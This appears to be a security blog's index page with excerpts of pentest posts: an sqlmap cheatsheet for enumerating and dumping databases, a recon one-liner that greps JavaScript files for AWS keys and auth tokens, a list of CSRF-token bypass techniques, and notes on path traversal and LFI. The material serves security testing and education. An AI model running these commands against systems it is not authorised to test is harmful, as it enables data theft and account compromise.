Posts

Sqlmap Cheatsheet

  NOTE : for each command using  --dbms=mysql. — — CHEAT SHEET — — # Enum DB sqlmap --dbms=mysql -u “http//domain/" --dbs # Enum tables sqlmap --dbms=mysql -u  “http//domain/"  -D target_DB --tables --current-user : enum current user --current-db : enum db name # Use POST methods sqlmap --dbms=mysql -u  “http//domain/"  --data=”data1=aaa&data2=bbb” # List of users and roles sqlmap --dbms=mysql -u  “http//domain/"  --users --roles --threads=10 # Custom Query sqlmap --dbms=mysql -u  “http//domain/"  --sql-query=”select * from master.sys.server_principals” # Dump table sqlmap --dbms=mysql -u  “http//domain/"  -D target_DB -T target_Table --dump # List columns sqlmap --dbms=mysql -u  “http//domain/"  -D target_DB -T target_Table --columns # Parameter sqlmap --dbms=mysql -u “http//.domain/param1=value1&param2=value2" --dbs -p param2 # Specify URIs sqlmap --dbms=mysql -u “http//.domain/param1/value1*/param2/value2" --dbs sqlmap -u ‘http//.

List of 100 web vulnerabilities-

There are 100 web vulnerabilities classified into different types or categories. Injection Vulnerabilities: 1. SQL Injection (SQLi) 2. Cross-Site Scripting (XSS) 3. Cross-Site Request Forgery (CSRF) 4. Remote Code Execution (RCE) 5. Command Injection 6. XML Injection 7. LDAP Injection 8. XPath Injection 9. HTML Injection 10. Server-Side Includes (SSI) Injection 11. OS Command Injection 12. Blind SQL Injection 13. Server-Side Template Injection (SSTI) Broken Authentication and Session Management: 14. Session Fixation 15. Brute Force Attack 16. Session Hijacking 17. Password Cracking 18. Weak Password Storage 19. Insecure Authentication 20. Cookie Theft 21. Credential Reuse Sensitive Data Exposure: 22. Inadequate Encryption 23. Insecure Direct Object References (IDOR) 24. Data Leakage 25. Unencrypted Data Storage 26. Missing Security Headers 27. Insecure File Handling Security Misconfiguration: 28. Default Passwords 29. Directory Listing 30. Unprotected API Endpoints 31. Open Ports and S

Analyze JavaScript files

A nalyze JavaScript files during your hunting process To analyze JavaScript files during your hunting process, you can use the following one-liner to extract all JavaScript files from a specific domain. Then, you can use the 'grep' command to filter and display only sensitive information like authentication tokens. Required tools for this process include: -A command-line interface. -A tool for recursively extracting JavaScript files from a domain. -The 'grep' command for pattern matching and extraction of sensitive data such as authentication tokens. -subfinder - https://github.com/projectdiscovery/subfinder -httpx - https://github.com/projectdiscovery/httpx -waybackurls - https://github.com/tomnomnom/waybackurls MAIN ONELINER:  subfinder -d domain.com | httpx -mc 200 | tee subdomains.txt && cat subdomains.txt | waybackurls | httpx -mc 200 | grep .js | tee js.txt GREP ONELINER FOR EXTRACTING TOKENS, AUTH,... : cat js.txt | grep -r -E “aws_access_key|aws_secret_k

How to Install Golang on WSL/WSL2 Kali

Image
How to Install Golang on WSL/WSL2 Kali Install Go- At the time of writing this blog, the most recent LTS version of Go is 1.18.3. wget https://dl.google.com/go/go1.18.3.linux-amd64.tar.gz sudo tar -xvf go1.18.3.linux-amd64.tar.gz sudo mv go /usr/local Edit .bashrc file- You have to edit .bashrc file before making further changes, you can follow below steps to open .bashrc file cd ~ explorer.exe . Open .bashrc file and add following lines at the bottom and save the file- export GOROOT=/usr/local/go export GOPATH=$HOME/go export PATH=$GOPATH/bin:$GOROOT/bin:$PATH Refresh your terminal using **bash **command bash Check Go Version go version Make sure it returns the same version that you installed.

File Path Traversal with Burp Intruder-Payload Processing

Image
File Path Traversal with Burp Intruder-Payload Processing:  Use the Burp Intruder and select Payload and do the processing as shown below- Start the attack.

Bypass CSRF-Token Verification

 A few ways to Bypass CSRF-Token Verification: 1. Use a blank CSRF token value. 2. Completely remove the CSRF token parameter value from the request. 3. Use any random CSRF Token of the same length. 4. Create another user account, copy its CSRF Token value and use it in the victim's account. 5. Try to decode the CSRF Token and check if it is encoded with algorithms like Base64, If yes it can be generated for other users. 6. Change request method i.e. from POST to GET. There is a possibility that the action gets initiated in both GET and POST method and it doesn't require a token in case of GET Method. Adding: Try bypassing with referrer based. Check whether CSRF tokens are expired properly. -->Old CSRF token re-use require physical access to the machine in order to exploit also the account should be logged in the time attacker access the device. It's a very low severity.

LFI-LFD-RFI-Path Traversal

Image
LFI-LFD-RFI-Path Traversal Local File Inclusion (LFI):  The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a dynamic file inclusion mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation. It also known as that is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application. Function that could result in LFI: 1-include () 2-inculde _once() 3-require () 4-require_once() Local File Disclosure (LFD):  The same as local file inclusion but it enable be to execute file not only read it . Note: Every LFI can be LFD but every LFD not necessary to be LFI. A local file inclusion vuln means it executes the contents it includes, like PHP's include() function. A local file disclosure vuln discloses the contents of the local file. Reconsider your definition of local fi